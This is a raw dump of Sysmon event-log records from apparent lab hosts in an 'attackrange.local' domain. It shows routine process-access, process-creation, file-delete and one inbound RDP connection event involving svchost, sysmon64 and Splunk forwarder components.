08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.350{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001053067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:15.666{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-57808-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x8000000000000000809584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.865{0C1E0330-F74D-60EB-C279-00000000D001}6321128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.740{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D07D7D01CCC51D5ABB219810288CED,SHA256=19A0EBBA13C3516CAC4E9A816BD63B77CE29F3DA2C3A5F8AF99852A76AF7F067,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.740{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.740{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.740{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:25.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A88AE20C3D70EA127759B92FFB2601AA,SHA256=9EB81DAE608C4E6A58EB3927AA5FB41304401CFAEEAAC7D049C423F2B9466E1D,IMPHASH=00000000000000000000000000000000falsetrue 
